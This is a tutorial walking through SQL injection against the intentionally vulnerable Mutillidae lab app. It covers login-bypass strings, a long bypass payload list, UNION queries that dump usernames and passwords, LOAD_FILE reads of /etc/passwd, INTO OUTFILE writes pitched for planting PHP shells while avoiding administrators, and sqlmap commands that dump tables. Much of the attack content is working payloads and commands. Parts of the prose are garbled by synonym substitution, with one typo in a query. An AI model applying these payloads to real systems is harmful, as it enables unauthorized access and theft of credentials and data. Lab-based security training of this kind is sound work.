Exploiting SQL injection vulnerabilities

·Attackers can utilize SQL Injection vulnerabilities to sidestep application

safety efforts. They can circumvent authentication and authorization of a
page or web application and recover the content of the whole SQL
database.

SQL Injection is a sort of infusion assault that makes it conceivable to

execute malicious SQL statements. These statements control a database

server behind a web application. Assailants can utilize SQL Injection

vulnerabilities to sidestep application safety efforts. They can circumvent

authentication and authorization of a page or web application and recover

the content of the whole SQL database. They can likewise utilize SQL

Injection to include, change, and erase records in the database. SQL

Injection vulnerability may influence any site or web application that uses

the SQL database, for example, MySQL, Oracle, SQL Server, or others.

Offenders may utilize it to increase unapproved access to your sensitive

information, client data, trade secrets, licensed innovation, and that’s only

the tip of the iceberg. SQL Injection assaults are one of the most

seasoned, most pervasive, and most dangerous web application

vulnerabilities.

Since this topic is so vast, we will not be able to mention all the nitty-gritty

stuff of SQL injection but will explain some of them starting with the

basics. For this purpose, we will use metasploitable’s Mutillidae web

application, which is vulnerable to SQL Injection attacks for

demonstration purposes only.

Select the “Mutillidae” link and go to the “Login/Register” tab and

register to create an account.

Provide necessary information and click on the “Create Account” button.

Now let’s use some SQL injection techniques to bypass the login page.

Login bypass is, undoubtedly, one of the most popular SQL injection

techniques. This tutorial presents different ways an attacker can use to

defeat a login form.

Discovering SQL injections in the POST field

The login structure we will use in our examples is straightforward. It

contains two input fields (username and password), which are both

vulnerable. The back-end content creates a query to approve the

username and secret key given by the client. Here is an outline of the

page rationale:

($query = “SELECT * FROM users WHERE

username=’$_POST[username]’ AND password=’$_POST[password]’“;).

To sidestep login and access restricted areas, the attacker needs to build

an SQL section that will change the “WHERE” clause and make it true.

For instance, the accompanying login data would give access to the

aggressor by abusing the weakness present in the password parameter.

For the username put “john.doe” or “anything” and for the password

put (anything’ or ‘1’=’1) or (admin’ or ‘1’=’1) then try to log in, and you’ll

be presented with an admin login page.

Let’s take a look at the generated query for a moment: (SELECT * FROM

users WHERE username=’john.doe’ AND password=’anything’ OR

‘1’=’1'). Due to operator priority, the “AND” condition is assessed first.

Then the “OR” operator is evaluated, making the “WHERE” statement

true. The condition will be valid for all lines of the “users” table. It implies

that the given username is disregarded, and the aggressor will be signed

in as the primary user in the “users” table. It additionally means that the

aggressor does not need to know a username to access the framework;

the query will discover one for him!

In these straightforward examples, we have seen that an aggressor can

sidestep an authentication system with SQL infusion. Without limiting the

disastrous consequences this might have, it is essential to mention that a

SQL injection can have a much more significant security impact than a

login bypass. Below is a list of commands created by OWASP board

member Dr. Emin Islam Tatlilf that can be used in the SQL injection

authentication bypass.
or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin’--

admin’ #

admin’/*

admin’ or ‘1’=’1

admin’ or ‘1’=’1'--

admin’ or ‘1’=’1'#

admin’ or ‘1’=’1'/*

admin’or 1=1 or ‘’=’

admin’ or 1=1

admin’ or 1=1--

admin’ or 1=1#

admin’ or 1=1/*

admin’) or (‘1’=’1

admin’) or (‘1’=’1'--

admin’) or (‘1’=’1'#

admin’) or (‘1’=’1'/*

admin’) or ‘1’=’1

admin’) or ‘1’=’1'--

admin’) or ‘1’=’1'#

admin’) or ‘1’=’1'/*

1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’,

‘81dc9bdb52d04dc20036dbd8313ed055

admin”--
admin” #

admin”/*

admin” or “1”=“1

admin” or “1”=“1”--

admin” or “1”=“1”#

admin” or “1”=“1”/*

admin” or 1=1 or ““=“

admin” or 1=1

admin” or 1=1--

admin” or 1=1#

admin” or 1=1/*

admin”) or (“1”=“1

admin”) or (“1”=“1”--

admin”) or (“1”=“1”#

admin”) or (“1”=“1”/*

admin”) or “1”=“1

admin”) or “1”=“1”--

admin”) or “1”=“1”#

admin”) or “1”=“1”/*

1234 “ AND 1=0 UNION ALL SELECT “admin”,

“81dc9bdb52d04dc20036dbd8313ed055

Bypassing login field

In this example, we’ll target only the username field and try to get access.

The username field is vulnerable as well, and it can likewise be misused to

access the framework. It would be less demanding and progressively

commonsense for the attacker to bypass authentication since he could

pick which user’s record he might want to sign into.

Here is what the SQL injection assault will look like. Put (admin’

#) or (admin’--) in the username field and hit “Enter” to log in. We

use “#” or “--” to comment everything in the query sentence that comes

after the username filed telling the database to disregard the password

field: (SELECT * FROM users WHERE username=’admin’ # AND

password=’ ‘). By using line commenting, the aggressor eliminates a part

of the login condition and gains access. This technique will make

the “WHERE” clause true only for one user; in this case, it is “admin.”

Union-based SQL injection

UNION-based SQL injection assaults enable the analyzer to extract data

from the database effectively. Since the “UNION” operator must be

utilized if the two inquiries have precisely the same structure, the attacker

must craft a “SELECT” statement like the first inquiry. To do this, a

substantial table name must be known, yet it is likewise vital to decide the

number of columns in the first inquiry and their information type.

In this tutorial, we will be using the “User Info” page from Mutillidae to

perform a Union-Based SQL injection attack. Go to “OWASP Top 10/A1 —

Injection/SQLi — Extract-Data/User Info” and use a login bypass

technique learned in our previous lecture to access the page.

From this point, all our attack vectors will be performed in the URL

section of the page using the Union-Based technique.

There are two different ways to discover how many columns are selected

by the original query. The first is to infuse an “ORDER BY” statement

indicating a column number. Given the column number specified is higher

than the number of columns in the “SELECT” statement, an error will be

returned. Otherwise, the results will be sorted by the column mentioned.

Since we do not know the number of columns, we start at 1. To find the

exact amount of columns, the number is incremented until an error

related to the “ORDER BY” clause is returned. In this example, we

incremented it to 6 and received an error message, so it means that the

number of columns is lower than 6.

When we ordered by 5, it worked and displayed some information. It
means there are five columns that we can work with.

Next, instead of using the “order by” option, let’s use the “union

select” option and provide all five columns.

Ex: (union select 1,2,3,4,5).

As it is shown in the screenshot columns 2, 3, and 4 are usable, so we can

substitute those numbers with any database values to see what they

correspond to. Let’s change column 2 to “database(),” column 3

to “user(),” and column 4 to “version().”

Ex: (union select 1,database(),user(),version(),5).

This Union command provided us some useful information; now, we know

that the database is “owasp10,” which has a user “root@localhost,” and

the version of the server is “5.0.51a-3ubuntu5”. Based on this information,

we can search for some vulnerabilities or attack vectors to compromise

our target further.

Finding database tables

Before building a query to extricate sensitive data, the assailant must

recognize what information he needs to remove and where it is stored in

the database. First and foremost, you have to realize that you might most

likely view tables that your database user has access to. In other words,

you might most likely rundown tables that your session client either
claims or on which the client has been allowed some authorization. Every

other table will appear to be inexistent.

In MySQL, the table “information_schema.tables” contains all the

metadata identified with table items. Below is listed the most useful

information on this table.

“table_name”: The name of the table.

“table_schema”: The outline in which the table was made.

If you want to limit the list of tables returned to the current schema, you

can add a “WHERE” clause to filter this column in combination

with “DATABASE()” and “SCHEMA()” functions.

Ex: (union select 1,table_name,null,null,5 from information_schema.tables

where table_schema = ‘owasp10’).

Here we want to retrieve table names from the “owasp 10” database.
As you can see, we have access to multiple tables named “accounts,”

“blogs_table,” “captured_data,” “credit_cards,”

“hitlog,” and “pen_test_tools.”

Extracting sensitive data such as passwords

When the attacker knows table names, he needs to discover what the

column names are to extract data. In MySQL, the

table “information_schema.columns” gives data about columns in tables.

One of the most useful columns to extract is called “column_name.”

Ex: (union select 1,colunm_name,null,null,5 from

information_schema.columns where table_name = ‘accounts’).

Here we are trying to extract column names from the “accounts” table.

Once we discovered all available column names, we can extract

information from them by just adding those column names in our query

sentence.

Ex: (union select 1,username,password,is_admin,5 from accounts).

As it is shown in the screenshot, we managed to retrieve all usernames

and passwords related to this database.

Reading and writing files on the web-server

In this instructional exercise, I will tell you the best way to access

documents on the target machine, just as how to transfer your very own

files and code onto the objective computer, all without ever stepping foot

into the administration panel of the target website.

We can use the “LOAD_FILE()” operator to peruse the contents of any file

contained within the web-server. We will typically check for

the “/etc/password” file to see if we get lucky and scoop usernames and

passwords to possible use in brute force attacks later.

Ex: (union select null,load_file(‘/etc/passwd’),null,null,null).

Now we will utilize the “INTO_OUTFILE()” operator for all that they offer

and attempt to root the objective server by transferring a shell-code

through SQL infusion. Remember, the general purpose of this is to tell you

the best way to do it without getting caught by the administrator panel.

This alternative enables you to take the contents from a column and spot

them in a decent text file for neatness purposes. You can also utilize it to

transfer a PHP shell-code to perform a remote file inclusion or CMD

execution.

Ex: (union select null,’Hello World!’,null,null,null into outfile

‘/tmp/hello.txt’).

In this example, we will write a “Hello World!” sentence and output it in

the “/tmp/” directory as a “hello.txt” file. This “Hello World!” sentence can
be substituted with any PHP shell-code that you want to execute in the

target server.

As it’s shown in the image, we successfully added our text and saved it in

the “/tmp” directory as a “hello.txt” file.

Discovering SQL injections and extracting data using SQLmap

Sqlmap is a standout amongst the most mainstream and ground-breaking

SQL injection automation tools out there. Given a vulnerable HTTP

request for URL, sqlmap can abuse the remote database and complete a

ton of hacking like removing database names, tables, columns, all the data

in the tables, and so on. It can even read and write documents on the

remote file system under specific conditions.

Utilizing sqlmap can be tricky when you are inexperienced with it. This

sqlmap instructional exercise aims to display the most vital functionalities

of this mainstream SQL infusion apparatus in a snappy and fundamental

way.
To start sqlmap and list all available options, type “sqlmap --help.” It will

provide everything you need to know and some examples of how to use it

in practice. Let’s take a look at this tool much closer.

Go to the Mutillidae login page and put some wrong credentials and

hit “Enter” to generate traffic and create a URL GET parameter.

Then copy the URL link and use it in the sqlmap tool.

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details).

Here “-u” stands for the target URL that you want to perform an SQL

injection attack.
To skip test payloads specific for other DBMSes, answer “Y” to the

question.

Within a few minutes of search, sqlmap has already found that the

username is injectable and vulnerable, as shown in the screenshot.

If you want to find more vulnerabilities, just let the process run until the

end, and it can find all available vulnerabilities. For this particular lecture,

we‘ll stop here by pressing “Crtl+C.”

Things get truly fascinating in this sqlmap tutorial with regards to

extracting data. It is a meticulous task to recover information stored in the

database from a SQL injection point, particularly when no outcome is

returned directly to the vulnerable webpage. Luckily, sqlmap enables the

analyzer to extricate valuable snippets of data without the hassle of

manual techniques. First, let’s extract all available databases on the

website we are trying to hack using a similar command, but at the end,

adding the “--dbs” option for the database.

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details --dbs).
Sqlmap extracted all available databases. To inject more SQL queries, we

need to know our current database by using the same command but

replacing the last parameter with “--current-db.”

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details --current-db).

The output of this command shows that we are in

the “owasp10” database.

Now let’s see all available tables for the database “owasp10” using the

command “--tables –D owasp10”.

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details --tables –D owasp10).

As it is shown in the screenshot, we managed to extract all available

tables for the database “owasp10”.

Sqlmap can also enumerate columns by implementing parameters “--

columns -T [table_name].”

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details --columns -T accounts).

It is even possible for the hacker to dump entire tables or databases and

list all valuable information using the option “--dump.”

Ex: (sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-

info.php&username=test&password=test&user-info-php-submit-

button=View+Account+Details — columns -T accounts --dump).

Note:

1. Sometimes sqlmap is unable to connect to the URL at all. It is possible

when it gets stuck at the first task of “testing connection to the target

url.” In such cases, it is helpful to use the “--random-agent” option. It

makes sqlmap use a valid user agent signature like the ones sent by a

browser like Chrome or Firefox.

2. For URLs that are not in the form of “parameter=value,” sqlmap can’t

naturally realize where to infuse. For instance, URLs

like “http://www.site.com/class_name/strategy/43/80”. In such cases,

sqlmap should be told the infusion point set apart by a “*.”

Ex: (http://www.site.com/class_name/technique/43*/80).

The above will advise sqlmap to infuse at the point set apart by “*.”

3. When using forms that submit data through the post method, then

sqlmap has to be provided the post data in the “--data” options.